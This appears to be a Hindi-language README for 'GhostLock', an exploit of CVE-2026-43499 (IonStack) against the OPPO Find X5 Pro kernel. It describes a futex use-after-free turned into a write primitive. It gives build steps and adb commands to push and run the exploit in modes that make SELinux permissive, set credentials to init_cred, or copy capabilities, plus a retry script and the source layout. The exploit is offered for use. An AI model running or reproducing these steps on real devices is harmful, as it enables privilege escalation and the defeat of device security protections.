
# GhostLock (CVE-2026-43499 / IonStack) अनुसंधान OPPO Find X5 Pro (PFEM10) के लिए: शोषण श्रृंखला, प्रगति, ब्लॉकर लॉग, और OPPO 5-सीरीज़ कर्नेल नोट्स
CVE-2026-43499 (IonStack) शोषण OPPO Find X5 Pro (PFEM10) के लिए।
कर्नेल 5.10.236-android12-9-o, futex CMP_REQUEUE_PI UAF → pi-tree राइट प्रिमिटिव।
अपने जोखिम पर उपयोग करें। पैनिक / रीबूट की उम्मीद करें। फर्मवेयर अपडेट न करें।
./build.sh # Android NDK r28c की आवश्यकता है
बिल्ड पैरामीटर निश्चित हैं (-O1 / android26) — इन्हें बदलने से स्टैक-ज्योमेट्री कैलिब्रेशन टूट जाता है।
adb push exploit /data/local/tmp/
adb shell /data/local/tmp/exploit W1 # SELinux permissive
adb shell /data/local/tmp/exploit W2 # child cred -> init_cred
adb shell /data/local/tmp/exploit W5 # caps-only cred copy
रीबूट के बीच पुनः प्रयास करें: bash run.sh <mode> [attempts]
src/ exploit + payload + offsets (exploit.c, payload.c, pfem10_target.h)
lib/ KernelSnitch heap-leak लाइब्रेरी
model/ rtmutex chain-walk मॉडल (होस्ट सत्यापन)
oplus_root_check द्वारा अवरुद्ध, caps-only मार्ग प्रगति पर)CyberMeowfia · IonStack (मूल शोषण)